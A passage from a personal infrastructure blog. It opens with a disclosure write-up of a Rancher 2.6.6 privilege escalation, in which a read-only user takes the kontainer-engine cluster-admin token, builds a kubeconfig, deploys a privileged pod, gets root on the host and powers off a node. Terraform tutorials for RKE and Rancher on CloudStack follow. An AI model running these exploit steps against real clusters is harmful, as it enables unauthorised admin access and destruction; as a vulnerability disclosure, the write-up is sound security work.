  ${BASEURL}/v1/management.cattle.io.clusters \
  | jq '.data[] | select(.spec.displayName=="extra-cluster") | .status'

The service account token you receive in the status.serviceAccountToken field of this object is not the user's token but the kontainer-engine's token. If we decode the JWT token, we see this is the result.

{
  "iss": "kubernetes/serviceaccount",
  "kubernetes.io/serviceaccount/namespace": "cattle-system",
  "kubernetes.io/serviceaccount/secret.name": "kontainer-engine-token-tpjsr",
  "kubernetes.io/serviceaccount/service-account.name": "kontainer-engine",
  "kubernetes.io/serviceaccount/service-account.uid": "232e5218-9248-4129-88e0-4ff9d9969271",
  "sub": "system:serviceaccount:cattle-system:kontainer-engine"
}

Decoded JWT token

This shows that the subject of this token is kontainer-engine, and it lives in the cattle-system namespace.

Using the JWT token

To use this JWT token, we need direct network access to the cluster's kube-api, as the Rancher proxy will not recognize the token. We can find the Kubernetes API endpoint from the browser or use the same API with curl.

BASEURL="https://rancher.1...4.sslip.io"

# Request UI token, or create API token manually
TOKEN=$(curl -s -k -XPOST \
  -d '{"description":"UI session",\
  "responseType":"token", \
  "username":"readonlyuser", \
  "password":"readonlyuserreadonlyuser"}' \
  ${BASEURL}/v3-public/localProviders/local?action=login \
  | jq '.token' -r)

# Fetch API endpoint downstream cluster
curl -s -k -XGET \
  -H "Authorization: Bearer $TOKEN" \
  ${BASEURL}/v1/management.cattle.io.clusters \
  | jq '.data[] | select(.spec.displayName=="extra-cluster2") | .status.apiEndpoint' -r
  
# Example response: https://1...2:6443

Fetching the downstream Kubernetes API endpoint

The endpoint is different from the base URL and should end in port 6443. If the downstream cluster is protected from direct accessing, you need to continue from the Rancher-provided shell in the top-right corner of the UI. Note that you'll need to download a precompiled version of curl.

You can continue using curl calls or set up kubectl to access the cluster. I will do the first call using curl, then set up kubectl to show both ways.

When requesting the ClusterRoleBindings for system:serviceaccount:cattle-system:kontainer-engine, we see that this service account is bound to the cluster-admin ClusterRole.

TOKEN="eyJhbGciOiJSUzI1NiIsImtpZCI6IlNkZ2h2QkxHMUR5cVIyV1BUYlNaMUFEcDg5UmNBQ3lxYlRhOWpwNGhHckEifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJjYXR0bGUtc3lzdGVtIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImtvbnRhaW5lci1lbmdpbmUtdG9rZW4tdHBqc3IiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoia29udGFpbmVyLWVuZ2luZSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6IjIzMmU1MjE4LTkyNDgtNDEyOS04OGUwLTRmZjlkOTk2OTI3MSIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpjYXR0bGUtc3lzdGVtOmtvbnRhaW5lci1lbmdpbmUifQ.C57WQ-tzUBce3R1Dfs7KU3KueTLor_D4MqAsQIwp9udxjORin-zmFCJXHyTysQI8d1ocisSnJE-ZNb-PvjzixGzDIvZcjA0a2YvFqA4Tmc5yyC4VzM_nZgrY8M5yBxTTdIZNoka9qCdpdavL9U4UuYvGDS5HXQ4_K-eSGb95VoIgzH355acjZEN6yv_d4fXyoqIYahAiwmlnWvFALQOqOoCzYrmHst-HoFI1AmXE_N4PZRVYaOoAlBia0Q2Fcl808arx9iGqi7UdKjfhqurb5-Aws8XNxrrMZoOCJYPu40NEjkX5yr517oCxk1I2frfUeO5jTxhexyqImzoOcl4TYA"

curl -s -k -X GET  -H "Authorization: Bearer $TOKEN" \
  https://--:6443/apis/rbac.authorization.k8s.io/v1/clusterrolebindings \
  | jq '.items[] | select(.subjects[].name=="kontainer-engine")'
{
  "metadata": {
    "name": "system-netes-default-clusterRoleBinding",
    "uid": "cb0a6201-6c70-4186-ac82-97761169859a",
    "resourceVersion": "803",
    "creationTimestamp": "2022-11-24T20:21:08Z",
    "managedFields": [
      {
        "manager": "Go-http-client",
        "operation": "Update",
        "apiVersion": "rbac.authorization.k8s.io/v1",
        "time": "2022-11-24T20:21:08Z",
        "fieldsType": "FieldsV1",
        "fieldsV1": {
          "f:roleRef": {},
          "f:subjects": {}
        }
      }
    ]
  },
  "subjects": [
    {
      "kind": "ServiceAccount",
      "name": "kontainer-engine",
      "namespace": "cattle-system"
    }
  ],
  "roleRef": {
    "apiGroup": "rbac.authorization.k8s.io",
    "kind": "ClusterRole",
    "name": "cluster-admin"
  }
}

Accessing the cluster role bindings with the kontainer-engine's JWT token

Service accounts bound to the cluster-admin cluster role have super-user access to the Kubernetes cluster. Therefore we can do anything to the cluster we want using this token. Let's put this in a kubeconfig file.

# The JWT token
token=eyJhbGciOiJSUzI1NiIsImtpZCI6IklvbXVOckJ1eFZrRVNZUDNXRnlndWNSbFpzRndIWjlKQnJkOFdDUG5ybFEifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJjYXR0bGUtc3lzdGVtIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImtvbnRhaW5lci1lbmdpbmUtdG9rZW4tcTY0eDUiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoia29udGFpbmVyLWVuZ2luZSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6ImNjM2QyNGVjLWI0MjItNGJmYy04M2U0LWE5ODJmOTRlYjJhOSIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpjYXR0bGUtc3lzdGVtOmtvbnRhaW5lci1lbmdpbmUifQ.ApVZZ9EEo7bqUeEpHdVqEklWL8GPN4fVfRwH0LtTm6lRsrQFnYVpus2VrjyeqoVTnrzEetsYZyWEiv0KODw3HYgePW_XbrrCqKSi3Aca6-sA5sJP28A4QWkUVH_6y-6nS53w24pdk77l-4YxXLIYTUilipe9JaXpzBrER5OsCNjweNILfmC5LHlRAtpvNVh7vahZsAxcDdDBzwpWuKubDz_3yRiHNH8nC-x40SJz90Xi771w7Aw7qvAvodX-5efVFHuzNw0Q4Qjcpj6RcV2I-rKGy5ORYgrXcNrXgPWZSpO8MU8iupS5XpW2SH9pgQI6Xe2QuyySia6I71ZkagsYWw

# Use a different kubeconfig file
export KUBECONFIG=~/kubeconfig-extra-cluster2

kubectl config set-cluster extra-cluster2 \
   --server=https://1...2:6443 \
   --insecure-skip-tls-verify=true

kubectl config set-credentials extra-cluster2-admin \
   --token=$token

kubectl config set-context extra-cluster2 \
   --user=extra-cluster2-admin \
   --cluster=extra-cluster2

kubectl config use-context extra-cluster2

kubectl auth can-i --list

Configuring the kubectl config

Running the above commands shows the following output.

kubectl auth can-i --list

Which essentially means unrestricted access. As an extra, let's gain access to the host and power it off, as we don't need this cluster anymore anyway.

kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml

> pod/everything-allowed-exec-pod created

kubectl exec -it everything-allowed-exec-pod -- chroot /host bash

> root@marco-test-extra-node3:/# id
> uid=0(root) gid=0(root) groups=0(root)
> root@marco-test-extra-node3:/# poweroff

Powering off one of the nodes

The new way

It's clear this token shouldn't be exposed to regular users. That's why the status field serviceAccountToken is being replaced by the serviceAccountTokenSecret field. This way, a separate privilege is needed to access the secret, which the regular user doesn't have.

This change can be seen in the following commit.

Migrate cluster service account tokens to secrets · rancher/rancher@05fab40

Complete container management platform. Contribute to rancher/rancher development by creating an account on GitHub.

GitHubrancher

If we upgrade Rancher to 2.6.7, we'll see the token's value disappear, and a new field will appear.

Reproducing the issue

Reading can be boring, so I wrote the post keeping in mind you want to follow along. This is a very easy exploit and, therefore, easily reproduced. I provide a Terraform module to set up a vulnerable Rancher cluster quickly. You can find it here. It works on DigitalOcean, and the only thing you should need to fill in is your API key.

To reproduce the issue. Let's spin up a new Kubernetes cluster and Rancher instance running version 2.6.6. Clone the above git repository to your local Linux machine and make sure you've got Terraform installed. I've used version 1.1.6 and later 1.3.5, so it doesn't matter which version you use.

Conclusion

This vulnerability has two sides. On the one hand, you still need to gain access to Rancher. On the other hand, it certainly doesn't help with the insider threat when privileges are this easily escalated.

In projects as big as Rancher, one change can potentially open doors that weren't supposed to be opened. This door can stay open for a very long time until someone notices it.

This was a great experience, from discovery to exploitation. I understand the gravity of the issue, but it was thrilling.

Thanks to Rancher for the great open-source tool, Guilherme from Rancher for the quick response to the issue and for keeping me updated, and my colleague Mike for checking and confirming the discovery and figuring out a way to bypass the firewall using the UI shell.

From Terraform monolith to modules

marco — Wed, 13 Apr 2022 21:08:03 GMT

In the last two posts, I've explored Terraform and its terraforming capabilities in enabling quick, repeatable environments in the cloud. This time I want to take the three previous subdirectories and put an over-arcing Terraform configuration which will use the other directories as modules. The config will probably allow me to easily manage their dependencies on each other.

Let's first start by getting a main.tf that tries to run them from the parent directory.

module "nodes" {
  source = "./nodes"
}

module "rke" {
  source = "./rke"
}

module "rancher" {
  source = "./rancher"
}

The over-arcing main Terraform configuration

Just run terraform init and terraform plan and you'll notice it won't work immediately.

Error: Unable to find remote state
 
   with module.rke.data.terraform_remote_state.nodes,
   on rke/main.tf line 19, in data "terraform_remote_state" "nodes":
   19: data "terraform_remote_state" "nodes" {
 
 No stored state was found for the given workspace in the given backend.

Error because of missing dependencies

We first need the cloud machines to run and generate the relevant configs before we can plan further. In this case, we're hitting a dependency order problem.

First, let's clean things up in the subdirectories. I just removed all Terraform generated stuff like this:

rm -rf terraform.tfstate* .terraform*
 
# only for RKE
rm -rf kubeconfig.yaml rke_debug.log

Remove unnecessary files

Be sure that you've deleted all infrastructure. It's easier when you've created a separate account.

Next, I've added the depends_on argument, and this resulted in another error:

 Error: Module module.rancher contains provider configuration
 
 Providers cannot be configured within modules using count, for_each or depends_on.


 Error: Module module.rke contains provider configuration
 
 Providers cannot be configured within modules using count, for_each or depends_on.

Error after depends_on

It wasn't a good idea to have the providers defined in the modules anyway. Let's rip them out and give them a nice place of their own.

I moved all provider configs into their own file, which caused multiple issues, which I will write below.

If you get the following error:

Error: Failed to query available provider packages

Could not retrieve the list of available versions for provider hashicorp/rke: provider registry registry.terraform.io does not have a provider named registry.terraform.io/hashicorp/rke

Did you intend to use rancher/rke? If so, you must specify that source address in each module which requires that provider. To see which modules are currently depending on hashicorp/rke, run the following
command:
    terraform providers

You should add the required_providers to the modules themselves too. Just don't add the provider block.

The first plan immediately showed the following issue:

Error: Provider configuration not present

To work with module.rancher.rancher2_bootstrap.admin its original provider configuration at module.rancher.provider["registry.terraform.io/rancher/rancher2"].bootstrap is required, but it has been removed.

This occurs when a provider configuration is removed while objects created by that provider still exist in the state. Re-add the provider configuration to destroy module.rancher.rancher2_bootstrap.admin,
after which you can remove the provider configuration again.

To fix this, make the module block of Rancher look like this:

module "rancher" {
  source = "./modules/rancher"
  depends_on = [
    module.rke
  ]
  providers = {
    rancher2.bootstrap = rancher2.bootstrap
    rancher2.admin = rancher2.admin    
  }
}

And in the Rancher main.tf:

terraform {
  required_providers {
    local = {
      source  = "hashicorp/local"
      version = "2.2.2"
    }
    rancher2 = {
      source  = "rancher/rancher2"
      version = "1.22.2"
      configuration_aliases = [ rancher2.bootstrap, rancher2.admin ]
    }
    helm = {
      source  = "hashicorp/helm"
      version = "2.4.1"
    }
  }
}

Now let's run terraform apply for the fourth time and have my fingers crossed.

It didn't work, and the RKE module stopped when it couldn't read the remote state of "cloud", which shouldn't be needed anymore.

The error:

No stored state was found for the given workspace in the given backend.

I've changed the following lines:

# In file rke.tf
 - for_each = data.terraform_remote_state.cloud.outputs.ip_address
 + for_each = var.rke_cluster_ips

# RKE module in file 00-main.tf
module "rke" {
  source = "./modules/rke"
  depends_on = [
    module.cloud
  ]

  rke_cluster_ips = module.cloud.ip_address
}

Running apply again gave me some more relative directory issues, which were easily fixed by adding ${path.module}/ or just removing the ../

The final directory structure is this:

.
├── modules
│   ├── cloud
│   │   ├── local_instances.tf
│   │   ├── main.tf
│   │   ├── provision-docker.sh
│   │   └── security_groups.tf
│   ├── rancher
│   │   ├── certmanager.tf
│   │   ├── main.tf
│   │   └── rancher.tf
│   └── rke
│       ├── main.tf
│       └── rke.tf
├── 00-main.tf
├── 01-cloud.tf
├── 02-rke.tf
├── 03-rancher-bootstrap.tf
├── rke_debug.log
├── terraform.tfstate
├── terraform.tfstate.backup
├── test_rsa
└── test_rsa.pub

4 directories, 18 files

Conclusion

With terraform apply running, we've squashed three runs into one single run. We can hit deploy and get something to drink, pet the cat, and return to an entirely freshly provisioned environment.

Efficiently scaling RKE with Terraform

marco — Sat, 26 Mar 2022 15:20:26 GMT

We've set up a quick start setup with one of everything in the previous blog post. One of everything is excellent for a quick test or check, but you might want to up those rookie numbers. In this blog post, we'll make it scale very easily.

If you haven't destroyed your previous setup, you should. Create a new clean account if you can't or don't want to. It's essential to have your infrastructure set up reproducible at every change from the ground up, and that's why we start from the beginning.

Creating multiple instances

First, let's move the instance definition to its own file called local_instances.tf. I've also changed the resource name to "local".

Now let's scale this instance up to two. We start with two and will scale up to three at the end to see what happens while it's in production. To scale it up easily, we need to add count = 2 to the instance configuration. However, more changes are required in the other parts of the Terraform config to make it work with the scaled instance.

After adding count = 2 to the instance config, I've also changed the name = "test" to name = "local-node${count.index + 1}" to reflect the name of the node in the CloudStack UI.

The complete local_instances.tf file now looks like this:

resource "cloudstack_instance" "local_nodes" {
  count              = 2
  name               = "local-node${count.index + 1}"
  service_offering   = "VM 4G/4C"
  network_id         = "g56cf51f-93ab-2351-a222-9c9525dc8533"
  template           = "Ubuntu 20.04"
  zone               = "zone.ams.net"
  keypair            = cloudstack_ssh_keypair.testkey.id
  expunge            = true
  security_group_ids = [cloudstack_security_group.Default-SG.id]
  root_disk_size     = 20

  connection {
    type        = "ssh"
    user        = "root"
    private_key = file("../test_rsa")
    host        = self.ip_address
  }
  
  provisioner "remote-exec" {
    inline  = ["curl https://releases.rancher.com/install-docker/20.10.sh | sh"]
  }
}

New local_instances.tf file

Now is the time to set up the DNS of the domain you'll use for Rancher.

Dynamic RKE nodes

To let RKE know it needs to install three nodes instead of one, we need to expose three IP addresses. To automate this, we'll use a wildcard array.

The outputs block is now changed to the following:

output "ip_address" {
  value = cloudstack_instance.local_nodes[*].ip_address
}

Output data

Now let's apply this config first. Terraform would remove the old node if you didn't remove it already. Terraform will create two new nodes.

To change RKE to dynamically add the nodes based on the output data of Cloud, we need to add a dynamic block.

resource "rke_cluster" "cluster_local" {
  dynamic "nodes" {
    for_each = data.terraform_remote_state.cloud.outputs.ip_address
    content {
      address = nodes.value
      user    = "root"
      role    = ["controlplane", "worker", "etcd"]
      ssh_key = file("../test_rsa")
    }
  }
}

The word "nodes" on the second line indicates the name of the block, but also the iterator name. The naming can be confusing, but the dynamic block label should match the wanted block's name. You can change the iterator name by adding iterator = "anothername" before content.

Before you run terraform plan, be sure to delete the terraform.tfstate file to start over. The removal is necessary because the old RKE cluster doesn't exist anymore. You can also remove it with terraform state rm.

When you run terraform plan you'll see it dynamically created the nodes blocks.

      + nodes {
          + address        = "1.2.3.4"
          + role           = [
              + "controlplane",
              + "worker",
              + "etcd",
            ]
          + ssh_agent_auth = (known after apply)
          + ssh_key        = (sensitive value)
          + user           = (sensitive value)
        }
      + nodes {
          + address        = "1.2.3.5"
          + role           = [
              + "controlplane",
              + "worker",
              + "etcd",
            ]
          + ssh_agent_auth = (known after apply)
          + ssh_key        = (sensitive value)
          + user           = (sensitive value)
        }
    }

Before we apply this config, we need to open up the firewall between them.

Security groups

To allow communication between the RKE nodes, we need to open up the firewall to each other and the world. I've created the following security group rules based on this page from Rancher.

resource "cloudstack_security_group_rule" "Default-SG-RKEs-Ruleset" {
  security_group_id = cloudstack_security_group.Default-SG.id

  rule {
    cidr_list = [for s in cloudstack_instance.local_nodes : format("%s/32", s.ip_address)]
    protocol  = "tcp"
    ports     = ["2379", "2380", "10250", "6443"]
  }

  rule {
    cidr_list = [for s in cloudstack_instance.local_nodes : format("%s/32", s.ip_address)]
    protocol  = "udp"
    ports     = ["8472"]
  }
}

I've also added 30000-32767 to Default-SG-Home-Ruleset.

Let's apply the cloud configuration now. You'll only create a new security_group_rule.

Scaling RKE

Now that the firewall is set up, you can run terraform apply. Once the two-node RKE cluster is up. Check whether it functions correctly using the created kubeconfig.yaml file.

marco@DESKTOP-WS:~/terra/rke$ export KUBECONFIG="./kubeconfig.yaml"
marco@DESKTOP-WS:~/terra/rke$ kubectl get nodes
NAME            STATUS   ROLES                      AGE   VERSION
1.2.3.4         Ready    controlplane,etcd,worker   46m   v1.21.7
1.2.3.5         Ready    controlplane,etcd,worker   46m   v1.21.7

Now let's check if everything will work as expected when we bump the count = 2 to count = 3! First, move back to the Cloud config. Then up the count and run apply again.

Plan: 1 to add, 1 to change, 0 to destroy.

Changes to Outputs:
  ~ ip_address = [
        # (1 unchanged element hidden)
        "1.2.3.5",
      + (known after apply),
    ]

It seems like one extra instance is created. We also see that Terraform recreated the security rule, which could form an issue in high traffic production usage. I'd suggest using dynamic block configuration to fix this issue maybe.

Perform the apply command. Watch the extra node, node3, be created and move to the RKE directory.

Applying the RKE config looks slightly off, and I think this is caused by the changing order of IP addresses that come from Cloud's output. We could change this into a mapped value, which could also come in handy to set the node_name, which is missing.

After 3 minutes and 35 seconds, the cluster is expanded. Let's check the node uptime ages.

local_sensitive_file.kube_config_yaml: Creating...
local_sensitive_file.kube_config_yaml: Creation complete after 0s [id=f5e0de88e06ce7c347247247f69d69a1268830732]

Apply complete! Resources: 1 added, 1 changed, 1 destroyed.
marco@DESKTOP-WS:~/tests/rke$ kubectl get nodes
NAME            STATUS   ROLES                      AGE    VERSION
1.2.3.4         Ready    controlplane,etcd,worker   60m    v1.21.7
1.2.3.5         Ready    controlplane,etcd,worker   60m    v1.21.7
1.2.3.6         Ready    controlplane,etcd,worker   103s   v1.21.7
marco@DESKTOP-WS:~/tests/rke$ kubectl get pods -n ingress-nginx
NAME                             READY   STATUS    RESTARTS   AGE
nginx-ingress-controller-88pf4   1/1     Running   0          62m
nginx-ingress-controller-h2glc   1/1     Running   0          4m35s
nginx-ingress-controller-srkwg   1/1     Running   0          62m

Conclusion

The cluster is scaled up without downtime to the running pods efficiently. I would implement a couple of more changes to the configuration before taking this to a production level. For example, you could:

Move it to modules and include these three directories from there
Have your state files in an S3 bucket
Moving variables to a separate tfvars file, making the config setup-agnostic
Mapping the IP addresses to their corresponding node-names

Rancher with Terraform on CloudStack

marco — Wed, 23 Mar 2022 22:15:22 GMT

I want to automate everything I can. Terraform is one of the automation tools I've checked out in the past but not thoroughly explored yet. After playing with AWS and Terraform for a while, I became worried I'd let some resources run wild, and they'd start billing my credit card like crazy. I got access to a CloudStack environment, which is fantastic, and decided to build a Rancher cluster against it with Terraform. I'm going to document my journey here in one or multiple posts.

Terraform is interesting. It allows you to create infrastructures from scratch while also removing every trace of its existence in seconds. Creating and destroying enables the flexibility to spin up a cluster when needed and break it down when finished.

This blog post will use Terraform to set up a Rancher server running on RKE, which we deploy on CloudStack.

And we're going to avoid having to do even a single task manually.

Creating the first VM

First things first, I needed a VM on CloudStack. After setting up API keys in my account and writing down the Terraform CloudStack provider's bare minimum, I added the first CloudStack instance resource.

terraform {
  required_providers {
    cloudstack = {
      source = "cloudstack/cloudstack"
      version = "0.4.0"
    }
  }
}

provider "cloudstack" {
  api_url    = "https://cloud.url/zone/api"
  api_key    = "api_key"
  secret_key = "secret_key"
}

resource "cloudstack_instance" "local_nodes" {
  name             = "local-node"
  service_offering = "VM 4G/4C"
  network_id       = "g56cf51f-93ab-2351-a222-9c9525dc8533"
  template         = "Ubuntu 20.04"
  zone             = "zone.ams.net"
  root_disk_size   = 20 # You'll need at least 10GB of space
  expunge          = true # This removes the VM completely after destroy
}

The Terraform configuration

To initialize Terraform and let it download the needed information and binaries to use the requested providers, we run terraform init. All that's left to do to see something running then is to run terraform apply.

Terraform used the selected providers to generate the following execution plan. Resource actions are indicated with the following symbols:
  + create

Terraform will perform the following actions:

  # cloudstack_instance.test will be created
  + resource "cloudstack_instance" "test" {
      + display_name     = (known after apply)
      + expunge          = true
      + group            = (known after apply)
      + id               = (known after apply)
      + ip_address       = (known after apply)
      + name             = "test"
      + network_id       = "g56cf51f-93ab-2351-a222-9c9525dc8533"
      + project          = (known after apply)
      + root_disk_size   = 20
      + service_offering = "VM 4G/4C"
      + start_vm         = true
      + tags             = (known after apply)
      + template         = "Ubuntu 20.04"
      + zone             = "zone.ams.net"
    }

Plan: 1 to add, 0 to change, 0 to destroy.

Do you want to perform these actions?
  Terraform will perform the actions described above.
  Only 'yes' will be accepted to approve.

  Enter a value: yes

cloudstack_instance.test: Creating...
cloudstack_instance.test: Still creating... [10s elapsed]
cloudstack_instance.test: Creation complete after 10s [id=9c9525dc8533-2592-450d-a774-g56cf51f]

Terraform apply result

Cool! The first machine is running, as can be seen from the UI. You can find the IP in the UI or by running terraform show. You'll likely get no response when you ping this machine. That's because the firewall still denies all traffic.

Setting up the security groups

To be able to access the machine, you'll have to add rules to the default security group. You can read more about them here. Adding rules can be done manually, but so can everything else, so we're using Terraform.

I've added the following security group and two security group rules in a new file called security_groups.tf. Terraform will read all *.tf files in the directory, so we don't have to worry about including them in main.tf. The world can ping the machine with these rules, but only we can access SSH.

resource "cloudstack_security_group" "Default-SG" {
  name        = "Default-SG"
  description = "Test SG for terraform tests"
}

resource "cloudstack_security_group_rule" "Default-SG-ICMP-Ruleset" {
  security_group_id = cloudstack_security_group.Default-SG.id

  rule {
    cidr_list = ["0.0.0.0/0"]
    protocol  = "icmp"
    icmp_code = -1
    icmp_type = -1
  }
}

resource "cloudstack_security_group_rule" "Default-SG-Home-SSH-Ruleset" {
  security_group_id = cloudstack_security_group.Default-SG.id

  rule {
    cidr_list = ["1.2.3.4/32"] # Your IP address
    protocol  = "tcp"
    ports     = ["22"]
  }
}

The security groups

When Terraform creates a resource, it exports some attributes about it, like the ID of the security group. We can use the ID exported by the security group resource to refer to it from the security group rule. This way, CloudStack knows to which security group a ruleset belongs.

Don't worry about the order of creation. Terraform knows when references depend on each other and creates the needed resources first.

To make the machine use this security group, we must add it to its instance definition.

resource "cloudstack_instance" "test" {
...
  expunge            = true
  security_group_ids = [cloudstack_security_group.Default-SG.id]
  
  connection {
    type        = "ssh"
...
  }

Adding the security_group_ids

Note that changing the security group of an instance results in replacing the machine.

Once a VM is assigned to a security group, it remains in that group for its entire lifetime; you can not move a running VM from one security group to another.

Which I find annoying.

Terraform will perform the following actions:

  # cloudstack_instance.test must be replaced
-/+ resource "cloudstack_instance" "test" {
      ~ display_name       = "test" -> (known after apply)
      + group              = (known after apply)
      ~ id                 = "9c9525dc8533-2592-450d-a774-g56cf51f" -> (known after apply)
      ~ ip_address         = "5.6.7.8" -> (known after apply)
        name               = "test"
      + project            = (known after apply)
      ~ root_disk_size     = 8 -> (known after apply)
      + security_group_ids = [
          + "ef6c8192-2795-440c-8774-1be8a969afd1",
        ] # forces replacement
      ~ tags               = {} -> (known after apply)
        # (7 unchanged attributes hidden)
    }

Plan: 1 to add, 0 to change, 1 to destroy.

Terraform apply

Applying the new configuration sets up a new machine with the changed security group ID. We can ping and access the SSH port but cannot yet login.

Adding keys to access the machine

To gain SSH access to the server we just created, we've to give CloudStack a keypair to include when bootstrapping the machine.

I've created an RSA key pair using ssh-keygen -t rsa and added the following to the main.tf. You can also use ~/.ssh/id_rsa.pub of course.

resource "cloudstack_instance" "test" {
...
  zone               = "zone.ams.net"
  keypair            = cloudstack_ssh_keypair.testkey.id # This line
  expunge            = true
  security_group_ids = [cloudstack_security_group.Default-SG.id]
...
}

resource "cloudstack_ssh_keypair" "testkey" {
  name       = "testkey"
  public_key = "${file("test_rsa.pub")}"
}

Add SSH keys to CloudStack.

Adding the key after the machine is created should be possible, but something goes wrong every time I update it. I don't believe that feature is working correctly right now, so I decided to destroy and re-apply everything.

Now I'm able to SSH into the machine using my test_rsa key. Let's set up the requirements for an RKE cluster.

Installing the required packages

I want to provision the server automatically with the needed docker packages. We could use Ansible for this or have a separate process to create perfect images with Packer, but let's stick to Terraform.

I've added the following to my main.tf

  connection {
    type        = "ssh"
    user        = "root"
    private_key = file("test_rsa")
    host        = self.ip_address
  }
  
  provisioner "remote-exec" {
    inline  = ["curl https://releases.rancher.com/install-docker/20.10.sh | sh"]
  }

Adding remote-exec provisioner

Terraform will not execute this directly. But don't worry, we don't have to fall back to manually logging in and running the commands. Lets just terraform destroy and terraform apply again :)

You'll see that Terraform tries to connect to SSH before the machine is finished starting up, but once it is, the preparation script from Rancher starts running immediately and installs Docker.

Setting up RKE

Terraform can set up an RKE cluster on the machine you just created using the RKE provider. This setup will be a single node RKE cluster. I've made another file named rke.tf which contains the following:

provider "rke" {
  debug = true
  log_file = "rke_debug.log"
}

resource "rke_cluster" "cluster_local" {
  nodes {
    address = cloudstack_instance.test.ip_address
    user    = "root"
    role    = ["controlplane", "worker", "etcd"]
    ssh_key = file("test_rsa")
  }
}

Adding RKE provider config

I've also added the following to the main.tf :

terraform {
  required_providers {
    cloudstack = {
      source = "cloudstack/cloudstack"
      version = "0.4.0"
    }
    # This part
    rke = {
      source = "rancher/rke"
      version = "1.3.0"
    }
  }
}

Adding RKE provider download

After which, you'll need to rerun terraform init to fetch the required provider.

When you run terraform apply now, you'll notice it says it wants to install an RKE cluster using Rancher's hyperkube version v1.21.7-rancher1-1. To use a newer version, you'll have to update a dependency in the RKE provider, but I'll explain how to do that in another separate blog post.

When you run terraform apply now, you'll notice an error:

Failed running cluster err:[network] Can't access KubeAPI port [6443] on Control Plane host: 4.5.6.7

The RKE provider can't connect to the machine's port 6443. Let's fix that by changing the Home-Ruleset in security_groups.tf:

resource "cloudstack_security_group_rule" "Default-SG-Home-Ruleset" {
  security_group_id = cloudstack_security_group.Default-SG.id

  rule {
    cidr_list = ["1.2.3.4/32"]
    protocol  = "tcp"
    ports     = ["22", "6443"]
  }
}

Adding 6443 to rules

Now RKE should install just fine. If not, destroy and re-apply. If you keep having random issues, check the available disk space and rke_debug.log.

Getting the kubeconfig.yaml

Of course, we want to access the RKE cluster from our terminal. We can see the kubeconfig yaml with terraform show -json but it's highly inefficient.

marco@DESKTOP-WS:~/tests$ terraform show -json | jq '.values["root_module"]["resources"][] | select(.address == "rke_cluster.cluster_local") | .values.kube_config_yaml' -r
apiVersion: v1
kind: Config
clusters:
- cluster:
    api-version: v1
    certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0F....

Extracting using JSON

We can automate it away using the local_sensitive_file resource of Terraform provider hashicorp/local. Add the following to rke.tf:

resource "local_sensitive_file" "kube_config_yaml" {
  content = rke_cluster.cluster_local.kube_config_yaml
  filename = "kubeconfig.yaml"
}

local_sensitive_file

And update the main.tf with the new provider used:

terraform {
  required_providers {
...
    local = {
      source = "hashicorp/local"
      version = "2.2.2"
    }
  }
}

main.tf Adding the local provider

Don't forget to run terraform init!

Running terraform apply writes the kubeconfig.yaml to the local filesystem. You can now talk to the RKE cluster.

marco@DESKTOP-WS:~/tests$ export KUBECONFIG=kubeconfig.yaml
marco@DESKTOP-WS:~/tests$ kubectl get nodes
NAME            STATUS   ROLES                      AGE   VERSION
5.6.7.8   Ready    controlplane,etcd,worker   23m   v1.21.7

Installing Rancher

Finally, we're ready to install Rancher after all the writing and five iterations of the RKE machine later. To do this, we'll be using the hashicorp/helm and rancher/rancher2 providers.

Add the providers to main.tf. Also, define the location of the kubeconfig.yaml

terraform {
  required_providers {
...
    rancher2 = {
      source = "rancher/rancher2"
      version = "1.22.2"
    }
    helm = {
      source = "hashicorp/helm"
      version = "2.4.1"
    }
  }
}

provider "helm" {
  kubernetes {
    config_path = "kubeconfig.yaml"
  }
}

Adding helm config to main.tf

Add ports 80 and 443 to securitygroups.tf, else you won't be able to access the cluster and Terraform can't bootstrap it.

Certmanager will be a dependency of Rancher, so create a new file called certmanager.tf :

resource "helm_release" "cert_manager" {
  name             = "cert-manager"
  namespace        = "cert-manager"
  repository       = "https://charts.jetstack.io"
  chart            = "cert-manager"
  version          = "1.5.3"

  wait             = true
  create_namespace = true
  force_update     = true
  replace          = true

  set {
    name  = "installCRDs"
    value = true
  }
}

Adding helm install to certmanager.tf

You can use set to override values like you would in a values.yaml

Next, create a file called rancher.tf :

resource "helm_release" "rancher" {
  name = "rancher"
  namespace = "cattle-system"
  chart = "rancher"
  repository = "https://releases.rancher.com/server-charts/latest"
  depends_on = [helm_release.cert_manager]

  wait             = true
  create_namespace = true
  force_update     = true
  replace          = true

  set {
    name  = "hostname"
    value = "rancher.debugdomain.com"
  }

  set {
    name  = "ingress.tls.source"
    value = "rancher"
  }
  
  set {
    name  = "bootstrapPassword"
    value = "A-Random-Password"
  }

  set {
    name  = "rancherImageTag"
    value = "v2.6.3-patch1"
  }
}

provider "rancher2" {
  alias = "bootstrap"

  api_url   = "https://rancher.debugdomain.com"
  insecure  = true
  bootstrap = true
}

# Create a new rancher2_bootstrap using bootstrap provider config
resource "rancher2_bootstrap" "admin" {
  provider = rancher2.bootstrap
  depends_on = [helm_release.rancher]
  initial_password = "A-Random-Password"
  # New password will be generated and saved in statefile
  telemetry = false
}

# Provider config for admin
provider "rancher2" {
  alias = "admin"

  api_url = rancher2_bootstrap.admin.url
